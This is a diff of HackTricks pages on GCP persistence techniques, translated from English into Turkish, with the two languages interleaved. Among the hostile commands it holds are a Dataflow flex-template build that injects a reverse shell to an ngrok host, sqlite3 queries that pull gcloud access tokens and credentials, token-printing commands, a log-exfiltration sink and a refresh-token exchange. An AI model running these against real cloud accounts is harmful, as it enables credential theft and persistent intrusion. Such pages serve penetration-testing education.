<figure><img src="../../../images/image (10).png" alt=""><figcaption></figcaption></figure>
However, if the user has actively used the cloudshell, the pop-up won't appear and you can **gather tokens of the user with**:
Ancak, kullanıcı bulut shell'i aktif olarak kullandıysa, pop-up görünmeyecek ve **kullanıcının token'larını toplayabilirsiniz**:
```bash
gcloud auth print-access-token
gcloud auth application-default print-access-token
```
#### SSH bağlantısının nasıl kurulduğu
#### How the SSH connection is stablished
Temelde, bu 3 API çağrısı kullanılır:
Basically, these 3 API calls are used:
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (yerel olarak oluşturduğunuz genel anahtarınızı eklemenizi sağlar)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (örneği başlatmanızı sağlar)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (google cloud shell'in ip'sini bildirir)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:addPublicKey) \[POST] (will make you add your public key you created locally)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start](https://content-cloudshell.googleapis.com/v1/users/me/environments/default:start) \[POST] (will make you start the instance)
- [https://content-cloudshell.googleapis.com/v1/users/me/environments/default](https://content-cloudshell.googleapis.com/v1/users/me/environments/default) \[GET] (will tell you the ip of the google cloud shell)
Ancak daha fazla bilgi bulabilirsiniz [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
But you can find further information in [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
## References
## Referanslar
- [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec)
- [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key)
- [https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/](https://securityintelligence.com/posts/attacker-achieve-persistence-google-cloud-platform-cloud-shell/)
{{#include ../../../banners/hacktricks-training.md}}

24
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md
View File

@@ -4,38 +4,34 @@
## Cloud SQL
For more information about Cloud SQL check:
Cloud SQL hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../gcp-services/gcp-cloud-sql-enum.md
{{#endref}}
### Expose the database and whitelist your IP address
### Veritabanınıığa çıkarın ve IP adresinizi beyaz listeye alın
A database only accessible from an internal VPC can be exposed externally and your IP address can be whitelisted so you can access it.\
For more information check the technique in:
Sadece bir iç VPC'den erişilebilen bir veritabanı dışarıya açılabilir ve IP adresiniz beyaz listeye alınarak erişim sağlayabilirsiniz.\
Daha fazla bilgi için tekniği kontrol edin:
{{#ref}}
../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
{{#endref}}
### Create a new user / Update users password / Get password of a user
### Yeni bir kullanıcı oluşturun / Kullanıcı şifresini güncelleyin / Bir kullanıcının şifresini alın
To connect to a database you **just need access to the port** exposed by the database and a **username** and **password**. With e**nough privileges** you could **create a new user** or **update** an existing user **password**.\
Another option would be to **brute force the password of an user** by trying several password or by accessing the **hashed** password of the user inside the database (if possible) and cracking it.\
Remember that **it's possible to list the users of a database** using GCP API.
Bir veritabanına bağlanmak için **sadece veritabanı tarafından açığa çıkarılan porta** ve bir **kullanıcı adı** ile **şifreye** ihtiyacınız var. Yeterli **yetkilere** sahip olduğunuzda **yeni bir kullanıcı oluşturabilir** veya mevcut bir kullanıcının **şifresini güncelleyebilirsiniz**.\
Başka bir seçenek, bir kullanıcının **şifresini brute force** yöntemiyle denemek veya veritabanındaki kullanıcının **hashlenmiş** şifresine erişip onu kırmaktır (mümkünse).\
GCP API'sini kullanarak **bir veritabanının kullanıcılarını listelemenin mümkün olduğunu** unutmayın.
> [!NOTE]
> You can create/update users using GCP API or from inside the databae if you have enough permissions.
> Yeterli izinleriniz varsa GCP API'sini kullanarak veya veritabanının içinden kullanıcıları oluşturabilir/güncelleyebilirsiniz.
For more information check the technique in:
Daha fazla bilgi için tekniği kontrol edin:
{{#ref}}
../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

12
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md
View File

@@ -4,7 +4,7 @@
## Compute
For more informatoin about Compute and VPC (Networking) check:
Compute ve VPC (Ağ) hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../gcp-services/gcp-compute-instances-enum/
@@ -12,12 +12,8 @@ For more informatoin about Compute and VPC (Networking) check:
### Persistence abusing Instances & backups
- Backdoor existing VMs
- Backdoor disk images and snapshots creating new versions
- Create new accessible instance with a privileged SA
- Mevcut VM'lere arka kapı ekleme
- Disk görüntüleri ve anlık görüntülerde yeni sürümler oluşturma
- Ayrıcalıklı bir SA ile yeni erişilebilir örnek oluşturma
{{#include ../../../banners/hacktricks-training.md}}

46
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md
View File

@@ -4,10 +4,9 @@
## Dataflow
### Invisible persistence in built container
Following the [**tutorial from the documentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) you can create a new (e.g. python) flex template:
### Görünmez kalıcılık, yerleşik konteynerde
Aşağıdaki [**belgelerden gelen öğreticiyi**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) takip ederek yeni bir (örneğin python) flex şablonu oluşturabilirsiniz:
```bash
git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git
cd python-docs-samples/dataflow/flex-templates/getting_started
@@ -19,39 +18,32 @@ gcloud storage buckets create gs://$REPOSITORY
# Create artifact storage
export NAME_ARTIFACT=flex-example-python
gcloud artifacts repositories create $NAME_ARTIFACT \
--repository-format=docker \
--location=us-central1
--repository-format=docker \
--location=us-central1
gcloud auth configure-docker us-central1-docker.pkg.dev
# Create template
export NAME_TEMPLATE=flex-template
gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \
--image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \
--sdk-language "PYTHON" \
--flex-template-base-image "PYTHON3" \
--metadata-file "metadata.json" \
--py-path "." \
--env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \
--env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \
--env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \
--env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \
--region=us-central1
--image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \
--sdk-language "PYTHON" \
--flex-template-base-image "PYTHON3" \
--metadata-file "metadata.json" \
--py-path "." \
--env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \
--env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \
--env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \
--env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \
--region=us-central1
```
**İnşa edilirken, ters bir shell alacaksınız** (önceki örnekte olduğu gibi ortam değişkenlerini veya Docker dosyasını rastgele şeyler çalıştıracak şekilde ayarlayan diğer parametreleri kötüye kullanabilirsiniz). Bu anda, ters shell içinde, **`/template` dizinine gidip çalıştırılacak ana python betiğinin kodunu değiştirmek mümkündür (örneğimizde bu `getting_started.py`)**. Buraya arka kapınızı yerleştirin, böylece iş her çalıştırıldığında, bunu çalıştıracaktır.
**While it's building, you will get a reverse shell** (you could abuse env variables like in the previous example or other params that sets the Docker file to execute arbitrary things). In this moment, inside the reverse shell, it's possible to **go to the `/template` directory and modify the code of the main python script that will be executed (in our example this is `getting_started.py`)**. Set your backdoor here so everytime the job is executed, it'll execute it.
Then, next time the job is executed, the compromised container built will be run:
Sonra, iş bir sonraki kez çalıştırıldığında, oluşturulan tehlikeye atılmış konteyner çalıştırılacaktır:
```bash
# Run template
gcloud dataflow $NAME_TEMPLATE run testing \
--template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \
--parameters=output="gs://$REPOSITORY/out" \
--region=us-central1
--template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \
--parameters=output="gs://$REPOSITORY/out" \
--region=us-central1
```
{{#include ../../../banners/hacktricks-training.md}}

12
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md
View File

@@ -1,25 +1,21 @@
# GCP - Filestore Persistence
# GCP - Filestore Sürekliliği
{{#include ../../../banners/hacktricks-training.md}}
## Filestore
For more information about Filestore check:
Filestore hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../gcp-services/gcp-filestore-enum.md
{{#endref}}
### Give broader access and privileges over a mount
### Bir montaj üzerinde daha geniş erişim ve ayrıcalıklar verme
An attacker could **give himself more privileges and ease the access** to the share in order to maintain persistence over the share, find how to perform this actions in this page:
Bir saldırgan **kendisine daha fazla ayrıcalık verebilir ve paylaşımın erişimini kolaylaştırabilir** böylece paylaşım üzerinde sürekliliği sağlamak için, bu eylemleri nasıl gerçekleştireceğinizi bu sayfada bulun:
{{#ref}}
gcp-filestore-persistence.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

10
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md
View File

@@ -4,7 +4,7 @@
## Logging
Find more information about Logging in:
Logging hakkında daha fazla bilgi için:
{{#ref}}
../gcp-services/gcp-logging-enum.md
@@ -12,14 +12,8 @@ Find more information about Logging in:
### `logging.sinks.create`
Create a sink to exfiltrate the logs to an attackers accessible destination:
Logları saldırganın erişebileceği bir hedefe dışarı aktarmak için bir sink oluşturun:
```bash
gcloud logging sinks create <sink-name> <destination> --log-filter="FILTER_CONDITION"
```
{{#include ../../../banners/hacktricks-training.md}}

76
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
View File

@@ -2,73 +2,60 @@
{{#include ../../../banners/hacktricks-training.md}}
### Authenticated User Tokens
To get the **current token** of a user you can run:
### Kimlik Doğrulanmış Kullanıcı Token'ları
Bir kullanıcının **mevcut token'ını** almak için şunu çalıştırabilirsiniz:
```bash
sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"
```
Check in this page how to **directly use this token using gcloud**:
Bu sayfada **bu tokeni gcloud kullanarak doğrudan nasıl kullanacağınızı** kontrol edin:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#id-6440-1
{{#endref}}
To get the details to **generate a new access token** run:
**Yeni bir erişim tokeni oluşturmak için** detayları almak için şunu çalıştırın:
```bash
sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"
```
Ayrıca **`$HOME/.config/gcloud/application_default_credentials.json`** ve **`$HOME/.config/gcloud/legacy_credentials/*/adc.json`** dosyalarında yenileme jetonları bulmak da mümkündür.
It's also possible to find refresh tokens in **`$HOME/.config/gcloud/application_default_credentials.json`** and in **`$HOME/.config/gcloud/legacy_credentials/*/adc.json`**.
To get a new refreshed access token with the **refresh token**, client ID, and client secret run:
Yeni bir erişim jetonu almak için **yenileme jetonu**, istemci kimliği ve istemci sırrı ile şunu çalıştırın:
```bash
curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
```
The refresh tokens validity can be managed in **Admin** > **Security** > **Google Cloud session control**, and by default it's set to 16h although it can be set to never expire:
**Admin** > **Güvenlik** > **Google Cloud oturum kontrolü** bölümünde yenileme tokenlarının geçerliliği yönetilebilir ve varsayılan olarak 16 saat olarak ayarlanmıştır, ancak asla süresinin dolmaması için ayarlanabilir:
<figure><img src="../../../images/image (11).png" alt=""><figcaption></figcaption></figure>
### Auth flow
The authentication flow when using something like `gcloud auth login` will open a prompt in the browser and after accepting all the scopes the browser will send a request such as this one to the http port open by the tool:
### Kimlik doğrulama akışı
`gcloud auth login` gibi bir şey kullanıldığında kimlik doğrulama akışı, tarayıcıda bir istem açar ve tüm kapsamları kabul ettikten sonra tarayıcı, aracın açtığı http portuna bu gibi bir istek gönderir:
```
/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1
```
Then, gcloud will use the state and code with a some hardcoded `client_id` (`32555940559.apps.googleusercontent.com`) and **`client_secret`** (`ZmssLNjJy2998hD4CTg2ejr2`) to get the **final refresh token data**.
Sonra, gcloud, bazı sabit kodlanmış `client_id` (`32555940559.apps.googleusercontent.com`) ve **`client_secret`** (`ZmssLNjJy2998hD4CTg2ejr2`) ile **son refresh token verilerini** almak için durumu ve kodu kullanacaktır.
> [!CAUTION]
> Note that the communication with localhost is in HTTP, so it it's possible to intercept the data to get a refresh token, however this data is valid just 1 time, so this would be useless, it's easier to just read the refresh token from the file.
> localhost ile iletişimin HTTP üzerinden olduğunu unutmayın, bu nedenle bir refresh token almak için verileri yakalamak mümkündür, ancak bu veri yalnızca 1 kez geçerlidir, bu nedenle bu işe yaramaz, refresh token'ı dosyadan okumak daha kolaydır.
### OAuth Scopes
You can find all Google scopes in [https://developers.google.com/identity/protocols/oauth2/scopes](https://developers.google.com/identity/protocols/oauth2/scopes) or get them executing:
### OAuth Kapsamları
Tüm Google kapsamlarını [https://developers.google.com/identity/protocols/oauth2/scopes](https://developers.google.com/identity/protocols/oauth2/scopes) adresinde bulabilir veya bunları çalıştırarak alabilirsiniz:
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u
```
It's possible to see which scopes the application that **`gcloud`** uses to authenticate can support with this script:
Bu betikle **`gcloud`**'un kimlik doğrulamak için kullanabileceği kapsamların hangileri olduğunu görebilirsiniz:
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope \r"
if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
echo ""
echo $scope
fi
echo -ne "Testing $scope \r"
if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
echo ""
echo $scope
fi
done
```
After executing it it was checked that this app supports these scopes:
Bunu çalıştırdıktan sonra, bu uygulamanın bu kapsamları desteklediği kontrol edildi:
```
https://www.googleapis.com/auth/appengine.admin
https://www.googleapis.com/auth/bigquery
@@ -78,31 +65,26 @@ https://www.googleapis.com/auth/devstorage.full_control
https://www.googleapis.com/auth/drive
https://www.googleapis.com/auth/userinfo.email
```
ilginçtir ki bu uygulamanın **`drive`** kapsamını desteklemesi, bir saldırganın kullanıcıyı bu kapsamla bir token oluşturması için zorlaması durumunda, kullanıcının GCP'den Workspace'e geçiş yapmasına olanak tanıyabilir.
it's interesting to see how this app supports the **`drive`** scope, which could allow a user to escalate from GCP to Workspace if an attacker manages to force the user to generate a token with this scope.
**Bunu nasıl** [**istismar edeceğinizi buradan kontrol edin**](../gcp-to-workspace-pivoting/#abusing-gcloud)**.**
**Check how to** [**abuse this here**](../gcp-to-workspace-pivoting/#abusing-gcloud)**.**
### Hizmet Hesapları
### Service Accounts
Just like with authenticated users, if you manage to **compromise the private key file** of a service account you will be able to **access it usually as long as you want**.\
However, if you steal the **OAuth token** of a service account this can be even more interesting, because, even if by default these tokens are useful just for an hour, if the **victim deletes the private api key, the OAuh token will still be valid until it expires**.
Kimlik doğrulaması yapılmış kullanıcılarla olduğu gibi, bir hizmet hesabının **özel anahtar dosyasını ele geçirirseniz**, genellikle **istediğiniz kadar erişim sağlayabilirsiniz**.\
Ancak, bir hizmet hesabının **OAuth token'ını çalarsanız** bu daha da ilginç olabilir, çünkü, varsayılan olarak bu token'lar sadece bir saat boyunca geçerli olsa da, eğer **kurban özel api anahtarını silerse, OAuth token hala geçerli kalacaktır**.
### Metadata
Obviously, as long as you are inside a machine running in the GCP environment you will be able to **access the service account attached to that machine contacting the metadata endpoint** (note that the Oauth tokens you can access in this endpoint are usually restricted by scopes).
ıkça, GCP ortamında çalışan bir makinenin içindeyseniz, o makineye bağlı hizmet hesabına **metadata uç noktasını arayarak erişim sağlayabilirsiniz** (bu uç noktada erişebileceğiniz OAuth token'larının genellikle kapsamlarla kısıtlandığını unutmayın).
### Remediations
### Çözüm Önerileri
Some remediations for these techniques are explained in [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
Bu teknikler için bazı çözüm önerileri [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2) adresinde açıklanmıştır.
### References
### Referanslar
- [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1)
- [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
{{#include ../../../banners/hacktricks-training.md}}

20
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md
View File

@@ -1,26 +1,22 @@
# GCP - Secret Manager Persistence
# GCP - Secret Manager Sürekliliği
{{#include ../../../banners/hacktricks-training.md}}
## Secret Manager
Find more information about Secret Manager in:
Secret Manager hakkında daha fazla bilgi için:
{{#ref}}
../gcp-services/gcp-secrets-manager-enum.md
{{#endref}}
### Rotation misuse
### Dönüşüm kötüye kullanımı
An attacker could update the secret to:
Bir saldırgan, sırrı güncelleyebilir:
- **Stop rotations** so the secret won't be modified
- **Make rotations much less often** so the secret won't be modified
- **Publish the rotation message to a different pub/sub**
- **Modify the rotation code being executed.** This happens in a different service, probably in a Cloud Function, so the attacker will need privileged access over the Cloud Function or any other service.
- **Dönüşümleri durdurmak** böylece sır değiştirilmez
- **Dönüşümleri çok daha az sıklıkta yapmak** böylece sır değiştirilmez
- **Dönüşüm mesajını farklı bir pub/sub'a yayınlamak**
- **Çalıştırılan dönüşüm kodunu değiştirmek.** Bu, muhtemelen bir Cloud Function'da farklı bir hizmette gerçekleşir, bu nedenle saldırganın Cloud Function veya başka bir hizmet üzerinde ayrıcalıklı erişime ihtiyacı olacaktır.
{{#include ../../../banners/hacktricks-training.md}}

20
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md
View File

@@ -1,10 +1,10 @@
# GCP - Storage Persistence
# GCP - Depolama Sürekliliği
{{#include ../../../banners/hacktricks-training.md}}
## Storage
## Depolama
For more information about Cloud Storage check:
Cloud Storage hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../gcp-services/gcp-storage-enum.md
@@ -12,8 +12,7 @@ For more information about Cloud Storage check:
### `storage.hmacKeys.create`
You can create an HMAC to maintain persistence over a bucket. For more information about this technique [**check it here**](../gcp-privilege-escalation/gcp-storage-privesc.md#storage.hmackeys.create).
Bir bucket üzerinde sürekliliği sağlamak için bir HMAC oluşturabilirsiniz. Bu teknik hakkında daha fazla bilgi için [**buradan kontrol edin**](../gcp-privilege-escalation/gcp-storage-privesc.md#storage.hmackeys.create).
```bash
# Create key
gsutil hmac create <sa-email>
@@ -24,19 +23,14 @@ gsutil config -a
# Use it
gsutil ls gs://[BUCKET_NAME]
```
Başka bir istismar betiği bu yöntem için [burada](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py) bulunabilir.
Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
### Kamu Erişimi Verme
### Give Public Access
**Making a bucket publicly accessible** is another way to maintain access over the bucket. Check how to do it in:
**Bir kovayı kamuya açık hale getirmek**, kova üzerindeki erişimi sürdürmenin bir başka yoludur. Bunu nasıl yapacağınızı kontrol edin:
{{#ref}}
../gcp-post-exploitation/gcp-storage-post-exploitation.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

5
src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md
View File

@@ -1,6 +1 @@
# GCP - Post Exploitation

Some files were not shown because too many files have changed in this diff Show More